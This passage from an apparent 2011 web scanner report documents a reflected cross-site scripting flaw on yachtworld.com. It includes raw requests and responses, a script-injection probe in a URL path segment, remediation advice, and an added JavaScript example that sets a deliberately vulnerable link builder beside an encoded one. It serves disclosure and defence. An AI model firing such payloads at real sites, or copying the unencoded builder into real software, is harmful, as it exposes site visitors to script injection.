Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:15 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:15 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States&boat_id=2237772">
...[SNIP]...

3.114. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 5 (the state segment of the path, "MD") is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b31"><script>alert(1)</script>b21ecc1901e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response: the leading "> closes the attribute value and the enclosing tag, so the <script> element that follows is parsed as markup rather than as part of the attribute. The random prefix (76b31) and suffix (b21ecc1901e) around the probe are what let the scanner distinguish a verbatim reflection from a coincidental match elsewhere in the page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the injection point is a path segment rather than a form field, a single link to the crafted URL is sufficient to trigger it in a victim's browser; no POST body or special request method is required. The fix is to apply HTML attribute encoding (and URL encoding where the value is itself placed inside a URL) to every path segment at the point it is written into markup, rather than relying on the segment having originated from one of the application's own canonical listing URLs.
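The following is an added example, not code from this report or from the yachtworld.com application. It reconstructs the reflection pattern described above (a decoded path segment concatenated into a double-quoted href), places the hardened form of the same output beside it, and applies a canary check in the style the scanner used. The link template is modelled on the photoGallery.jsp href visible in the preceding response excerpt; the server-side code itself is not on the page, so both builder functions and the segment list are hypothetical reconstructions.

```javascript
// Added example (not code from the report or the yachtworld.com application):
// a hypothetical reconstruction of the reflection described in the issue detail,
// the hardened form of the same output, and a canary check in the scanner's style.

// Encode a string for use inside a double-quoted HTML attribute value.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical vulnerable builder: the decoded path segments of the request URL
// (year, listing slug, city, state, country) are concatenated straight into the
// "back" parameter of a double-quoted href. A segment containing "> therefore
// terminates the attribute value and the <a> tag.
function buildGalleryLinkVulnerable(segments, boatId) {
  const back = '/core/boats/' + segments.join('/');
  return '<a rel="nofollow" href="/core/listing/photoGallery.jsp?boat_id=' +
    boatId + '&back=' + back + '">';
}

// Hardened builder: each segment is URL-encoded (the "back" value is a URL carried
// inside a query string), and the whole attribute value is attribute-encoded at
// the point it is written into HTML. Either step alone stops this payload; both
// are the correct encodings for their respective contexts.
function buildGalleryLinkSafe(segments, boatId) {
  const back = '/core/boats/' + segments.map(encodeURIComponent).join('/');
  const href = '/core/listing/photoGallery.jsp?boat_id=' +
    encodeURIComponent(boatId) + '&back=' + encodeURIComponent(back);
  return '<a rel="nofollow" href="' + encodeAttr(href) + '">';
}

// Canary check in the scanner's style: the random prefix and suffix around the
// probe make a verbatim reflection distinguishable from a coincidental match.
function reflectsUnencoded(html, prefix, probe, suffix) {
  return html.includes(prefix + probe + suffix);
}

// The probe and markers taken from the report's request for this issue.
const PREFIX = '76b31';
const PROBE = '"><script>alert(1)</script>';
const SUFFIX = 'b21ecc1901e';

// Constructed input modelled on the request: the state segment (REST URL
// parameter 5, "MD") carries the payload.
const SEGMENTS = [
  '2005', 'Regulator-32-Forward-Seating-2237772', 'Parkton',
  'MD' + PREFIX + PROBE + SUFFIX, 'United-States',
];

// Run both builders over the same input and report whether the probe survives.
function demo() {
  const vulnerable = buildGalleryLinkVulnerable(SEGMENTS, '2237772');
  const safe = buildGalleryLinkSafe(SEGMENTS, '2237772');
  return {
    vulnerable,
    safe,
    vulnerableReflects: reflectsUnencoded(vulnerable, PREFIX, PROBE, SUFFIX),
    safeReflects: reflectsUnencoded(safe, PREFIX, PROBE, SUFFIX),
  };
}

const result = demo();
console.log(result.vulnerable);
console.log(result.safe);
console.log('vulnerable builder reflects probe:', result.vulnerableReflects);
console.log('hardened builder reflects probe:', result.safeReflects);
```

Running the block prints the two generated anchors: the first contains the raw <script> element outside the attribute, the second carries only percent-encoded and entity-encoded text, which a browser treats as an inert string. The same reflectsUnencoded check, pointed at a live response body, is the minimal regression test to add once the encoding fix is deployed.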

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD76b31"><script>alert(1)</script>b21ecc1901e/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:42 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fn